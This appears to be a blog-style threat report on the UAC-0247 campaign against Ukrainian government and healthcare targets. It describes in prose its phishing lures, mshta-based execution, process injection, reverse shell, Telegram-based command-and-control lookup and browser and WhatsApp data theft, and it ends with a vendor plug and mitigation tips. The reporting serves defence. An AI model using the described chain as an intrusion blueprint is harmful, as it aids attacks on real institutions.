A newly uncovered cyber campaign attributed to the threat cluster UAC-0247 has drawn serious attention after targeting Ukrainian government bodies and healthcare institutions. The findings, disclosed by CERT-UA, reveal a multi-layered attack chain designed to infiltrate systems, establish persistence, and extract sensitive data from both browsers and communication platforms like WhatsApp.
The campaign was active between March and April 2026, and while attribution remains uncertain, the level of sophistication strongly indicates a well-resourced threat actor. The operation demonstrates a growing trend in cyber warfare where attackers combine social engineering, legitimate tools, and advanced malware to bypass traditional defenses.
Initial Access Through Social Engineering
The attack begins with a phishing email disguised as a humanitarian aid proposal. This tactic is particularly effective in high-stress environments, as it exploits urgency and trust.
Recipients are directed to a link that leads either to a compromised legitimate website or a convincingly crafted fake page generated with AI tools. In some cases, attackers leverage cross-site scripting vulnerabilities to inject malicious content into trusted domains, increasing the likelihood of user interaction.
Once the victim engages, they are prompted to download a Windows shortcut file (LNK), which acts as the entry point for the infection.
Execution Chain and Payload Deployment
Opening the LNK file triggers the execution of an HTA file via βmshta.exe,β a legitimate Windows utility frequently abused in malware campaigns. The HTA displays a decoy interface to distract the user while silently downloading additional payloads.
The next stage involves injecting shellcode into trusted processes such as runtimeBroker.exe. This technique allows the malware to operate under the guise of legitimate system activity, making detection significantly more difficult.
More advanced variants use a two-stage loader architecture, with the second stage built using a custom executable format. The payload is encrypted and compressed, further complicating forensic analysis.
Establishing Persistence and Remote Control
The attackers deploy a reverse shell known as RAVENSHELL, which establishes a persistent connection with a command-and-control server. This allows them to execute commands remotely using standard tools like cmd.exe.
In parallel, the malware family AGINGFLY is deployed. Written in C#, it communicates with attackers via WebSockets and enables a wide range of malicious actions, including command execution, file exfiltration, and keylogging.
A PowerShell component named SILENTLOOP enhances resilience by dynamically retrieving command-and-control infrastructure from Telegram channels. This ensures the malware remains operational even if primary servers are taken down.
Data Theft and Network Expansion
The primary objective of the campaign is data exfiltration. Attackers target credentials, browser cookies, and session data from Chromium-based browsers. They also deploy tools capable of extracting WhatsApp Web data, giving them access to private communications.
Additional tools support lateral movement, allowing attackers to expand their presence within compromised networks. Some deployments also include cryptocurrency mining modules, indicating a potential financial motive alongside intelligence gathering.
Why These Attacks Are Hard to Detect
The use of legitimate system utilities, encrypted payloads, and multi-stage execution makes this campaign particularly stealthy. Traditional security tools often struggle to differentiate between normal and malicious activity in such scenarios.
This is where platforms like IntelligenceX become essential. By offering visibility into exposed assets, malicious domains, and attacker infrastructure, IntelligenceX enables organizations to detect threats early in the attack lifecycle.
Security teams using IntelligenceX can monitor suspicious activity, analyze infrastructure patterns, and correlate threat intelligence across multiple sources.
Mitigation Strategies
Organizations should restrict execution of LNK, HTA, and script-based files, and limit the use of tools like mshta.exe and PowerShell. Continuous monitoring and user awareness training are also critical.
Conclusion
The UAC-0247 campaign highlights the evolving nature of cyber threats. Organizations must adopt proactive, intelligence-driven security strategies to defend against such sophisticated attacks.
Top comments (0)